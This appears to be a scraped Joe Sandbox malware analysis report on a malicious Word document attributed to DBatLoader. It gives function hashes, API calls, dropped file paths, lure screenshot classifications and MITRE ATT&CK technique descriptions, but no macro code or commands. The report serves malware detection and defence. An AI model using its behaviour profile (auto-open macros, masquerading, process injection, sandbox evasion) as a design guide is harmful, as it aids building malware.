Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: CB41D77DA016299BCBA1DB5CCC90BD9B3BDAF49214F0041D5EB49E7211DA30AF848F51

Function 028FACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: f829cd4e5bca7b3d2f995f07d533ebb767dc816127d45791537ebea49c8180f2
Instruction ID: 10ab58cf874656e11726eb45fff63e2d7f7376046c6cfdf6180b560f0c8c2434
Opcode Fuzzy Hash: f829cd4e5bca7b3d2f995f07d533ebb767dc816127d45791537ebea49c8180f2
Instruction Fuzzy Hash: 5A411D7DA402589BDBA1EB68CC84BDAB7FDAB08311F0440E5A64CE7251DB74AF848F51

Function 028FACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: bed660fa06bb60ece5c2aedf5f4e47746007dd9ab8b2b4443d7a9f7714b5a8ff
Instruction ID: cbdeb137e6c65bedc56632d73939b46dae769120ce8b8d5717a132bf6c61c259
Opcode Fuzzy Hash: bed660fa06bb60ece5c2aedf5f4e47746007dd9ab8b2b4443d7a9f7714b5a8ff
Instruction Fuzzy Hash: 0241317DA402589BDBA1EB68CC84BDAB7FDAB08311F0440E5A74CE7251DB74AF848F51

Function 028F1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398798eafb2d2a173f1834fa80a3a9cf5f3e8bed6425e0f856d8156d589a20bc
Instruction ID: a44643acf6239db483a67b8fcd874f99e28eb5468ff57bf29ee45a48a8f03e38
Opcode Fuzzy Hash: 398798eafb2d2a173f1834fa80a3a9cf5f3e8bed6425e0f856d8156d589a20bc
Instruction Fuzzy Hash: 33A1166E7102008BD758AA7C9C883BDB3D2DBD4325F18823EE31DCB785EB68C9558751

Function 028F946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028F955A), ref: 028F94F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028F955A), ref: 028F94F8

Strings

yyyy, xrefs: 028F94CD

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 512adb160fbe18983f13102b826838fc9545bcd4d7f9d5b5622a9b09f1722dcf
Instruction ID: 417a61e19a31ebf79f5ca88e536787f87631cef77118cc750795f2d5c571e0c0
Opcode Fuzzy Hash: 512adb160fbe18983f13102b826838fc9545bcd4d7f9d5b5622a9b09f1722dcf
Instruction Fuzzy Hash: C421807DA002189FDB90DFA8C851BAEB3B9EF48710F4040A6EB09E7250D7749E40CB66

Function 0290AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AD90
IsBadWritePtr.KERNEL32(?,00000004), ref: 0290ADC0
IsBadReadPtr.KERNEL32(?,00000008), ref: 0290ADDF
IsBadReadPtr.KERNEL32(?,00000004), ref: 0290ADEB

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction ID: 4cf987eec7bbac07407d60a5247ee46a4967645d358eb5edef6108908165c2a8
Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction Fuzzy Hash: 02215CB564031D9FDB10DF69CC81BAE77A9EF80361F008211EF54D7280EB38E9519AE4

Input	Output
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zYj1wg0cM2.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF2AC84D8B447F429D.TMP

C:\Users\user\Desktop\~$j1wg0cM2.doc

C:\Windows\SysWOW64\brightness.exe

Static File Info

General

File Icon

Static OLE Info

General

OLE File "zYj1wg0cM2.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4808

General

VBA Code

Windows Analysis Report
zYj1wg0cM2.doc

Subroutine
AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

Function 0290F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535
filesleepCOMMON

Function 028F5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 0290F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Function 0290DFE4 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 0290E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Function 02907CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Function 02906D48 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Function 028F1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre